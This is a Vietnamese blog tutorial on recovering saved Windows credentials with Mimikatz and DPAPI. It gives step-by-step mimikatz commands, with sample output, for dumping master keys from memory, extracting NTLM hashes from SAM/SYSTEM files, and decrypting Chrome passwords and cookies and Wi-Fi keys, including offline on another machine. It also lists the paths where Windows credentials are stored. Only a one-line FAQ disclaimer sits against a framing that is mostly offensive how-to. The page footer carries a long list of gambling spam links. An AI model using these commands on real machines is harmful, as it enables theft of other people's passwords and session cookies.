• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA

Ellyx13 by Ellyx13
19/01/2021 - Updated on 24/07/2025
in Basic Hacking
A A
0

Mục lục bài viết

  1. Cách Windows lưu trữ mật khẩu
  2. Cách mã hóa và giải mã bằng DPAPI
  3. Cách giải mã tệp DPAPI trên máy tính khác
  4. Cách tìm Windows Masterkeys
  5. Cách lưu và sử dụng master keys
  6. CREDHIST
  7. Cách trích xuất tất cả mật khẩu của Google Chome
  8. Cách trích xuất tất cả cookie của Google Chome
  9. Cách trích xuất mật khẩu Wi-Fi của Windows
  10. Cách trích xuất mật khẩu Google Chrome từ một máy tính khác
  11. Nơi Windows lưu trữ mật khẩu
  12. Kết luận
  13. Câu hỏi thường gặp
    1. Mimikatz là gì và nó hoạt động như thế nào?
    2. DPAPI (Giao diện lập trình ứng dụng bảo vệ dữ liệu) là gì và vai trò của nó trong việc lưu trữ mật khẩu?
    3. Tôi có thể sử dụng Mimikatz để truy cập mật khẩu của người khác mà không cần sự cho phép không?

Trong bài viết “Cách hack mật khẩu Windows“, mình đã hướng dẫn các bạn cách hack pass login Windows 10 bằng truy xuất RAM. Còn trong bài viết hôm nay, mình sẽ hướng dẫn các bạn làm quen với chương trình mimikatz 2, chương trình mà mình đã sử dụng để trích xuất mật khẩu trong hệ thống đang sử dụng hoặc từ các tệp đăng ký Windows từ một máy tính khác.

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Cách Windows lưu trữ mật khẩu

Ngoài mật khẩu dùng để đăng nhập vào Windows, các mật khẩu dưới đây cũng được lưu trữ trong hệ điều hành này:

Các bài viết liên quan

Cách tăng độ dài mã PIN trên Windows để nâng cao bảo mật 27

Cách tăng độ dài mã PIN trên Windows để nâng cao bảo mật

15/02/2025 - Updated on 25/07/2025
Cách kiểm tra mật khẩu có bị lộ từ vụ rò rỉ dữ liệu RockYou 2024 28

Cách kiểm tra mật khẩu có bị lộ từ vụ rò rỉ dữ liệu RockYou 2024

09/07/2024 - Updated on 24/07/2025
Đang miễn phí ứng dụng quản lý mật khẩu Sticky Password Premium có giá $30 29

Đang miễn phí ứng dụng quản lý mật khẩu Sticky Password Premium có giá $30

05/01/2024 - Updated on 24/07/2025
Cách xem lại mật khẩu Wifi trên Andorid, iPhone và máy tính 30

Cách xem lại mật khẩu Wifi trên Andorid, iPhone và máy tính

27/06/2022 - Updated on 24/07/2025
  • Credential Manager
  • Windows Vault
  • Mật khẩu trình duyệt IE
  • Mật khẩu Wifi
  • Certifications
  • Mật khẩu VPN
  • SSH keys
  • Mật khẩu Google Chrome
  • Chứng chỉ Google Talk, Skype, Dropbox, iCloud, Safari

Tất cả các mật khẩu này đều được mã hóa. Để mã hóa mật khẩu và thông tin đăng nhập, hệ thống phải sử dụng DPAPI (Giao diện lập trình ứng dụng bảo vệ dữ liệu). Đối với người dùng cuối, tất cả các quy trình mã hóa và giải mã dữ liệu đều được minh bạch, tức là các nhà phát triển không đụng chạm tới dữ liệu thô của bạn.

Mật khẩu người dùng được sử dụng để mã hóa các dữ liệu này. Chính xác hơn, các master keys (khóa chính) được tạo ra, với sự trợ giúp của dữ liệu được mã hóa và giải mã, và mật khẩu người dùng được sử dụng để giải mã các khóa chính. Một người dùng có thể có nhiều master keys. Trên thực tế, hàm băm sẽ băm tất cả các mật khẩu cũ được lưu trữ và cố gắng giải mã khóa chính cho đến khi tìm thấy mã băm phù hợp.

Yêu cầu bắt buộc của cơ chế giải mã này là bạn phải có khoá chính phù hợp , ví dụ, mật khẩu từ trình duyệt web Google Chrome. Nhưng nếu bạn sao chép tệp chứa mật khẩu của trình duyệt này sang máy tính khác mà không có khóa chính của máy cũ, thì bạn sẽ không thể giải mã các mật khẩu này.

Cách mã hóa và giải mã bằng DPAPI

Chúng ta sẽ tiếp tục dùng công cụ mimikatz để thực nghiệm Hack tất cả Password đã lưu trên Windows.

Như đã đề cập ở trên, DPAPI được sử dụng để mã hóa và giải mã dữ liệu. DPAPI khá đơn giản không chỉ cho người dùng cuối, mà còn cho các nhà phát triển muốn sử dụng cách mã hóa này – có hai chức năng chính của DPAPI là mã hóa và giải mã, chúng có thể được gọi từ ứng dụng.

Trước khi chuyển sang trích xuất Password từ trình duyệt web và các Password khác được lưu trữ trên Windows, hãy tìm hiểu kỹ hơn về DPAPI. Nhiều bài báo hay đã giải thích cách hoạt động của DPAPI. Vậy nên mình sẽ không giải thích lại nữa, mà chỉ đơn giản là cung cấp các bài viết ở đây. Thay vì đi sâu vào chi tiết lý thuyết của DPAPI, chúng ta hãy thực hiện một vài ví dụ thực tế: mã hóa một chuỗi hoặc tệp bằng DPAPI.

Xem thêm:  3 Cách xóa Password Windows nhanh nhất không cần nhập mật khẩu cũ

Mô-đun dpapi được sử dụng để làm việc với DPAPI, lệnh protect được sử dụng để mã hóa dữ liệu. Lệnh này có tùy chọn bắt buộc là /data, cuối cùng, bạn chỉ cần nhập đường dẫn đến file hoặc văn bản cần mã hoá là được.

Ví dụ: tôi muốn mã hóa chuỗi ‘Test string to encrypt’:

dpapi::protect /data:"Test string to encrypt"

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA

Hãy chú ý đến phần “Blob:” – đây là dữ liệu được mã hóa ở dạng nhị phân.

Thay vì hiển thị dữ liệu trên command line, chúng có thể được lưu bằng tùy chọn /out:

dpapi::protect /data:"Test string to encrypt" /out:crypted.txt

Kết quả là, tệp crypted.txt đã được tạo. Tệp này chứa dữ liệu “Test string to encrypt” được mã hóa.

Như bạn có thể thấy, chúng ta không cần phải suy nghĩ về khóa chính và mật khẩu – hệ điều hành sẽ tự làm mọi thứ.

Để giải mã, hàm blob được sử dụng (blob là dữ liệu được mã hóa theo phương pháp này) từ cùng một mô-đun dpapi. Hàm này có một tùy chọn bắt buộc là /in, sau đó bạn cần chỉ định dữ liệu để giải mã. Để giải mã, bạn cũng cần chỉ tuỳ chọn /unprotect, nếu không thông tin về blob (dữ liệu được mã hóa) sẽ chỉ được hiển thị mà không có giải mã:

dpapi::blob /in:crypted.txt /unprotect

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 16Nếu bạn muốn lưu dữ liệu đã giải mã vào một tệp, thì hãy sử dụng tùy chọn /out.

Cách giải mã tệp DPAPI trên máy tính khác

Điều gì xảy ra nếu mình chuyển tệp crypto.txt sang một máy tính khác và cố gắng giải mã nó bằng cùng một lệnh trên? Thử xem nhé:

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 17

Việc giải mã đã không thành công và xuất hiện lỗi:

* using CryptUnprotectData API ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {ac45381a-d9db-4c68-b0e9-7410667c3984}

Nếu bạn để ý kỹ lỗi thì sẽ tìm ra được, thứ chúng ta cần là Masterkey ac45381a-d9db-4c68-b0e9-7410667c3984.

Chuỗi ac45381a-d9db-4c68-b0e9-7410667c398 là mã băm khóa chính. Có thể nói đây là mã định danh hay vân tay của chìa khóa. Trên máy tính ban đầu, nơi dữ liệu đã được mã hóa, việc giải mã chúng rất đơn giản và dễ dàng. Còn khi chúng ta cố gắng giải mã dữ liệu này mà không có khóa chính sẽ không thành công. Vậy nên, thứ chúng ta cần là chỉ định Masterkey từ máy tính ban đầu, cụ thể là máy mà dữ liệu được mã hóa.

Mình đã trích xuất Masterkey và sẽ chỉ định nó bằng cách sử dụng tùy chọn /masterkey và chạy lại lệnh giải mã trên máy tính khác:

dpapi::blob /in:crypted.txt /unprotect /masterkey:5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3daefb14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 18

Thành công rồi đó!

Cách tìm Windows Masterkeys

Mimikatz có chức năng trích xuất tất cả các master keys của người dùng hiện tại. Nhưng trước khi chuyển sang phần đó, chúng ta phải tìm hiểu các masterkeys để hiểu hết về cách giải mã này nhé.

Ở dạng đã giải mã, ví dụ masterkey trông như thế này: 5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3daefb14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8

Các masterkeys được mã hóa và lưu trữ trong một thư mục có dạng %appdata%\Microsoft\Protect{sid}*. Giải thích:

  • %appdata% kà C:\Users<USER>\AppData\Roaming
  • {sid} là user SID

Trong CMD (Win + r → gõ cmd), bạn có thể thấy SID của mình bằng lệnh:

wmic useraccount where name="%USERNAME%" get sid

Lệnh đó sẽ không hoạt động trong PowerShell. Các lệnh sau sẽ hoạt động trong cả CMD và PowerShell.

Tìm SID của bạn:

whoami /user

Tìm SID cho tất cả các user:

wmic useraccount get name,sid

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 19

Các masterkey được mã hoá trên ổ cứng của bạn:

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 20

Hàm dpapi::masterkey có thể giải mã các masterkey. Nếu bạn chỉ sử dụng chức năng này với tùy chọn /in, và chỉ định đường dẫn đến masterkey, thì thông tin về nó sẽ được hiển thị mà không cần giải mã:

Xem thêm:  Kiểu Tấn công Browser In The Browser (BITB) là gì

dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-4099021954-1290662600-116018068-1001\ac45381a-d9db-4c68-b0e9-7410667c3984"

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 21

Để trích xuất tất cả các masterkey của người dùng hiện tại cùng một lúc, hãy chạy lệnh:

sekurlsa::dpapi

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 22

Các masterkeys trong này gồm:

Authentication Id : 0 ; 371163 (00000000:0005a9db) Session : Interactive from 1 User Name : MiAl Domain : HACKWARE-MIAL Logon Server : HACKWARE-MIAL Logon Time : 25.02.2020 13:25:54 SID : S-1-5-21-4099021954-1290662600-116018068-1001 [00000000] * GUID : {abd3abfe-f620-46e4-a5ee-8dc314ef4169} * Time : 25.02.2020 18:34:11 * MasterKey : 450e3e2609e394dfef60c90533a06ddd84dc9968965bd8579a3c40607704077e506c8d0738e6f42cfd934b3eb75eedc3c29fe7deb8dd0cf05ddb4deb653fcbff * sha1(key) : 806d3a6453a45b9b4eb3e8edafc9dd4b12c0d494 [00000001] * GUID : {ac45381a-d9db-4c68-b0e9-7410667c3984} * Time : 25.02.2020 18:26:00 * MasterKey : 5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3daefb14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8 * sha1(key) : d5a7975eea70b6fe5eae3809ed3c7e9c864d1333

GUID là một định danh (identifier), tên của một tệp masterkey. MasterKey chính là khóa chủ.

Để thuận tiện, mimikatz lưu trữ một bộ nhớ cache của các masterkey được giải nén. Và không chỉ lưu trữ và hiển thị chúng, mà còn sử dụng masterkeys nếu cần cho các hoạt động nhất định. Để xem nội dung của bộ nhớ đệm, hãy chạy lệnh:

dpapi::cache

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 23

Các masterkeys được giải nén có thể được sử dụng trên máy khác.

Cách lưu và sử dụng master keys

Để lưu bộ nhớ cache, hãy sử dụng các tùy chọn /save và /file: FILE:

dpapi::cache /save/file:cache.bin

Nếu bạn sử dụng tuỳ chọn /file, thì theo mặc định, dữ liệu sẽ được lưu vào tệp mimikatz_dpapi_cache.ndr.

Để load bộ nhớ cache, hãy sử dụng tùy chọn /load và /file: FILE:

dpapi::cache /load /file:cache.bin

CREDHIST

Tệp này nằm trên đường dẫn “%appdata%\Microsoft\Protect\CREDHIST”, chỉ tác dụng trong trường hợp không thuộc domain nào cả. Tệp này:

  • chứa: thông tin đăng nhập được mã hóa trước đó của người dùng (SHA1 & NTLM)
  • được sử dụng để: giải mã masterkey
  • được bảo vệ bởi: mật khẩu SHA1 được dùng gần đây nhất
  • mỗi entry được bảo vệ bởi khóa trước đó, …..

Để xem các thuộc tính của tệp này, hãy chạy lệnh:

dpapi::credhist /in:"%appdata%\Microsoft\Protect\CREDHIST"

Ví dụ kết quả:

**CREDHIST** dwVersion : 00000001 - 1

guid : {86cddf31-2b68-42fb-a6e6-28b628228fc8}

dwNextLen : 00000000 - 0

Mình đã cố gắng giải mã tệp này trong mimikatz bằng lệnh:

dpapi::credhist /in:"Z:\files\CREDHIST" "/password:qweqwe123" /sid:S-1-5-21-4099021954-1290662600-116018068-1003

nhưng lại không thành công. Nếu bạn biết cách giải mã nó, hãy để lại bình luận nhé.

Cách trích xuất tất cả mật khẩu của Google Chome

Trong mimikatz, sử dụng lệnh dpapi :: chrome, bạn có thể trích xuất tất cả mật khẩu của người dùng hiện tại. Bạn cần sử dụng tùy chọn /in với đường dẫn đến tệp lưu trữ thông tin xác thực. Tệp này nằm trong “%localappdata%\Google\Chrome\User Data\Default\Login Data”. Nhân tiện, tệp này thuộc dạng cơ sở dữ liệu SQLite, trong đó tất cả dữ liệu ngoại trừ mật khẩu (ví dụ: địa chỉ của các trang web) được lưu trữ dưới dạng văn bản rõ ràng. Và mật khẩu được mã hóa bằng DPAPI. Để giải mã, chúng ta cần phải sử dụng tuỳ chọn /unprotect:

dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

Cách trích xuất tất cả cookie của Google Chome

Google Chome lưu trữ cookie trong tệp “%localappdata%\Google\Chrome\User Data\Default\Cookies”. Như với mật khẩu của trang web, tất cả dữ liệu ngoại trừ cookie sẽ được lưu trữ dưới dạng văn bản rõ ràng. Để truy xuất tất cả thông tin của cookie, hãy chạy lệnh:

dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect

Cách trích xuất mật khẩu Wi-Fi của Windows

Trong Windows, mật khẩu Wi-Fi có thể được trích xuất mà không cần mimikatz, ví dụ:

netsh wlan export profile interface= "<INTERFACE NAME>" key=clearfolder=c:\ netsh wlan export profile interface="*"key=clearfolder=c:\

Để phương pháp này hoạt động, bạn phải cắm card Wi-Fi.

Nhược điểm của phương pháp này là nó không hoạt động đối với máy tính đã tắt.

Trong mimikatz có lệnh dpapi :: wifi và dpapi :: wwan tương ứng để trích xuất mật khẩu từ các kết nối Wi-Fi và WWAN đã lưu.

Mật khẩu Wi-Fi được lưu dưới dạng:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{interface guid}*.xml

Và mật khẩu WWAN được lưu dưới dạng:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles{interface guid}*.xml

Bạn cần bắt đầu bằng cách lấy các masterkeys. Vì mình thực hiện các lệnh này trên local, nên mình giải mã các masterkey bằng lệnh:

sekurlsa::dpapi

Mình đã tìm thấy trên local hai interfaces, mỗi interfaces có một cấu hình kết nối Wi-Fi:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{24FF5798-6078-4148-96B5-75191CCEA209}{0C67E040-68A8-42A4-B870-8B5AA5E4823B}.xml
  • C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{C623DA26-72C0-4DD6-99B1-6E2C2D06E8C5}{A372AA08-55B8-4A66-A349-EAAB48580E0A}.xml
Xem thêm:  Tạo Server VPS riêng để Hack Data 4G miễn phí

Để trích xuất mật khẩu Wi-Fi, mìnhchạy các lệnh:

dpapi::wifi /in:"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{24FF5798-6078-4148-96B5-75191CCEA209}\{0C67E040-68A8-42A4-B870-8B5AA5E4823B}.xml"

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 24

Mật khẩu trong dòng “Key Material:”.

dpapi::wifi /in:"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{C623DA26-72C0-4DD6-99B1-6E2C2D06E8C5}\{A372AA08-55B8-4A66-A349-EAAB48580E0A}.xml" /unprotect

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 25

Nếu masterkeys không có trong bộ nhớ cache mimikatz, bạn có thể chỉ định rõ ràng nó bằng tùy chọn /masterkey.

Cách trích xuất mật khẩu Google Chrome từ một máy tính khác

  1. Để giải mã tệp “%localappdata%\Google\Chrome\User Data\Default\Login Data”, bạn cần Masterkey được mã hóa mật khẩu trong tệp này.
  2. Để giải mã masterkeys, bạn cần mật khẩu người dùng Windows để đăng nhập vào hệ thống và tệp masterkeys được mã hóa, tức là tệp %appdata%\Microsoft\Protect{sid}*.
  3. Để bẻ khóa mật khẩu người dùng Windows, bạn cần có hàm băm NTLM.
  4. Để truy xuất mã băm NTLM, bạn cần các tệp đăng ký (registry files) C:/Windows/System32/config/SAM và C:/Windows/System32/config/SYSTEM, hoặc kết xuất lsass.DMP. Hơn nữa, tốt hơn là sử dụng kết xuất vì có thể trích xuất hàm băm SHA1 từ nó và hàm băm này có thể được sử dụng trực tiếp để giải mã masterkeys.
    lsadump::sam /system:C:\path\to\SYSTEM /sam:C:\path\to\SAM
  5. Sau đó, để lấy Masterkey ngoại tuyến, bạn cần chạy lệnh sau:
    dpapi::masterkey /in:"path\to\encrypted\masterkey" "/password:target_user_password" /sid:target_user_SID

SID có thể được lấy từ tên thư mục đến masterkeys được mã hóa.

dpapi::masterkey /in:"Z:\files\1f89c852-1c9d-47f9-81f8-b18be7c11512" "/password:qweqwe123" /sid:S-1-5-21-4099021954-1290662600-116018068-1003

Nếu thành công, thông tin sau sẽ được hiển thị ở cuối kết quả:

[masterkey] with volatile cache: SID:S-1-5-21-4099021954-1290662600-116018068-1003;GUID:{1bd91e0f-25f3-49e9-a370-bc68d1f0d272};MD4:ca76a176340f0291e1cc8ea7277fc571;SHA1:886d0f341f3c29030ec855334a08e52868c06c69; key : 89e43af0a178c2f1c7311c028dd75e2d2489fc78a3df92808094b1671785d6fd7f107ec562320bcaa8563be759abbf60bf70791107c5240cda2cfddcb003df19 sha1: b73d4d8cbbdafa960e49ca480559a4b530e65f05

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 26

Dòng chính bắt đầu bằng key– đây là masterkey được giải mã.

Ngoài ra, masterkeys sẽ được lưu vào bộ nhớ đệm.

Cuối cùng, để giải mã ngoại tuyến mật khẩu trình duyệt Google Chrome, hãy chạy lệnh:

dpapi::chrome /in:"PATH\TO\Login Data" /unprotect /masterkey:MASTERKEY

Nếu masterkey đã có trong bộ nhớ cache, thì bạn có thể bỏ qua tùy chọn /masterkey.

Nơi Windows lưu trữ mật khẩu

Đây là các đường dẫn đến các tệp được mã hóa bằng DPAPI. Nếu bị thiếu cái nào, thì các bạn nhớ bình luận nhé:

Pivot table của tác giả mimikatz (rất khó đọc):

  • File Excel liệt kê nơi lưu Password trong Windows

Mật khẩu Wi-Fi được lưu trữ trong:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{interface guid}*.xml

Mật khẩu WWAN được lưu trữ trong:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles{interface guid}*.xml Xml

Cookies Google Chrome được lưu trữ trong:

  • %localappdata%\Google\Chrome\User Data\Default\Cookies

Mật khẩu của website được lưu trữ trong:

  • %localappdata%\Google\Chrome\User Data\Default\Login Data

% localappdata% thường là ‘C:\Users<USERNAME>\AppData\Local’.

Các masterkeys đã mã hóa được lưu trữ trong một thư mục có dạng %appdata%\Microsoft\Protect{sid}*.

  • %appdata% là C:\Users<USERNAME>\AppData\Roaming
  • {sid} là user SID

System master keys:

  • c:\Windows\System32\Microsoft\Protect*

Chứng chỉ user:

  • %APPDATA%\Microsoft\SystemCertificates\My\Certificates\
  • %APPDATA%\Microsoft\Crypto\RSA<SID>\

Chứng chỉ hệ thống:

  • HKLM:\SOFTWARE\Microsoft\SystemCertificates\MY\Certificates*
  • C:\Programdata\Microsoft\Crypto\RSA\MachineKeys\

Dropbox:

  • HKCU\SOFTWARE\Dropbox\ks
  • HKCU\SOFTWARE\Dropbox\ks1
  • %APPDATA%\Local\Dropbox\instance1\config.dbx
  • %APPDATA%\Local\Dropbox\instance_db\instanse.dbx

Rsa securid:

  • %LOCALAPPDATA%\RSA\SecurIDStorage

Kết luận

Bạn sẽ tìm thấy thêm thông tin trong tài liệu về các mô-đun và lệnh của mimikatz. 

Câu hỏi thường gặp

Mimikatz là gì và nó hoạt động như thế nào?

Mimikatz là một công cụ mạnh mẽ cho phép truy xuất mật khẩu và thông tin đăng nhập đã lưu trong hệ điều hành Windows. Nó hoạt động bằng cách khai thác các lỗ hổng bảo mật để truy cập vào bộ nhớ hệ thống và trích xuất dữ liệu nhạy cảm, bao gồm cả mật khẩu được lưu trữ bởi Credential Manager, trình duyệt web và các ứng dụng khác.

DPAPI (Giao diện lập trình ứng dụng bảo vệ dữ liệu) là gì và vai trò của nó trong việc lưu trữ mật khẩu?

DPAPI là một cơ chế mã hóa được tích hợp sẵn trong Windows, được sử dụng để bảo vệ dữ liệu nhạy cảm, bao gồm mật khẩu. Nó mã hóa dữ liệu bằng cách sử dụng các khóa chính được liên kết với tài khoản người dùng. Để giải mã, cần có khóa chính tương ứng.

Tôi có thể sử dụng Mimikatz để truy cập mật khẩu của người khác mà không cần sự cho phép không?

Không. Sử dụng Mimikatz để truy cập mật khẩu của người khác mà không có sự cho phép là bất hợp pháp và vi phạm đạo đức nghề nghiệp. Công cụ này chỉ nên được sử dụng cho mục đích nghiên cứu bảo mật hoặc với sự cho phép của chủ sở hữu hệ thống.

Tags: DAPAhack passwordMimikatzpassword
Ellyx13

Ellyx13

DevOps với hơn 7 năm kinh nghiệm trong lĩnh vực hạ tầng, tự động hóa CI/CD và triển khai hệ thống phân tán trên các nền tảng như AWS, Azure và Kubernetes. - AWS Certified DevOps Engineer – Professional - Certified Kubernetes Administrator (CKA) - HashiCorp Certified: Terraform Associate - Docker Certified Associate (DCA) Có người không dám bước vì sợ gãy chân, nhưng sợ gãy chân mà không dám bước đi thì khác nào chân đã gãy.

Related Posts

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit 31
Basic Hacking

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

08/03/2025 - Updated on 25/07/2025
Cách khai thác lỗ hổng DLL Hijacking trên Windows 32
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025 - Updated on 25/07/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 33
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 34
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024 - Updated on 24/07/2025
Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 35
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024 - Updated on 24/07/2025
Seekr: Thu thập & quản lý dữ liệu OSINT 36
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Nhận 25.000 điểm Viettel miễn phí cực dễ dàng nhân dịp sinh nhật 25 năm 21

Nhận 25.000 điểm Viettel miễn phí cực dễ dàng nhân dịp sinh nhật 25 năm

by Thanh Kim
20/10/2025
0

Cách đổi màu và thêm icon cho Folder iPhone 22

Cách đổi màu và thêm icon cho Folder iPhone

by Thanh Kim
20/10/2025
0

Hướng dẫn tạo ảnh tâm trạng dưới tuyết bằng AI 23

Hướng dẫn tạo ảnh tâm trạng dưới tuyết bằng AI

by Thanh Kim
19/10/2025
0

ChatGPT Agent là gì? Cách sử dụng ra sao? 24

ChatGPT Agent là gì? Cách sử dụng ra sao?

by Thanh Kim
18/10/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • Việt trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • HAI trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • thịnh trong Hướng dẫn nhận key IObit Uninstaller 14 miễn phí 6 tháng
  • veoe trong Bí quyết tạo ảnh cầm bó hoa đẹp như bìa tạp chí với Nano Banana
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • mon trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Felizz23 trong Namecheap khuyến mãi 3 Domain giá 0$
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • ann trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Kim trong Namecheap khuyến mãi 3 Domain giá 0$
  • em hậu trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • Võ Sĩ Cua trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Tuấn Tú trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Quốc Vũ trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Ski trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • linh trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Heheehe🐧 trong Top 10 Phần mềm miễn phí cho Windows 11 nên cài
  • Jdi trong Download Hack of Products v5 APK – Hack vật phẩm trên Android
  • Hoàng Na trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • nam trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram

©2025 AnonyViet - Chúng tôi mang đến cho bạ những kiến thức bổ ích về CNTT Công nghệ kết quả xổ số hôm nay trực tiếp bóng đá xoilac xoilac 8x bet https://cwfun.org/ 33win Ae888 kubet kubet 8kbet 99ok xin88 good88 xn88 kubet RR88 cakhiatv f8bet https://qq883a.com/ XX88 mu88 casino https://u888.one/ https://sunwin10.org/ f168 fm88 xin88 https://918xxy.com/ kubet thailand vip66 xoso66 vip66 xoso66 https://tp88fun.com/ daga hello88 qq88 GK88 PG88 SV388 PG88 Xoso66 Vip66 hitclub bong99 Ga6789 XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 Thabet press ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ sunwin https://ok9393.com/ sv368pro https://xx88.space/ xoilac cakhiatv socolive QQ88 TP88 Xoso66 xoso66 u888 79king pg88 f168 88vv https://mm88.today/ mu88 com 8kbet https://qq88pro.vip/ xoso66 98win fun88.supply king88 33win sv388 v9bet s666 https://max88rl.com/ https://ok365rl.com/ EE88 FB88 TYPHU88 https://xx88.ink/ https://da88.design/ 789f Kkwin go88 79king xin88 XX88 VSBET 23WIN https://mb66co.com/ https://fun88.supply/ pg88 thapcamtv thapcamtv https://rr88.navy/ https://e2beting.com/ gem88 bk8 bk8 F8BET80 typhu88 k8cc sa88 https://q23win.com/ 32win 32win 78win 68win BET88 luongsontv luongsontv https://vankhanhtv.cc/ 9bet https://nohutm.com SODO fun88 sunwin BL555 u888 https://nohumo.com 8xbet W88 link cola tv colatv trực tiếp bóng dá colatv trực tiếp bóng dá colatv colatv truc tiep bong da colatv colatv bóng dá trực tiếp 58win https://s68win.com/ 58WIN NOHU90 https://hm8805.com/ GK88 https://go991.club/ 188bet ax88 8KBET 69VN 33WIN 32win Kuwin https://bbet88b.com/ Jun88.estate OK9 SHBET https://xx88.center/ vswin uu88 HM88 NỔ HỦ ĐỔI THƯỞNG 789PCOM NHÀ CÁI MMOO bắn cá TT88COM 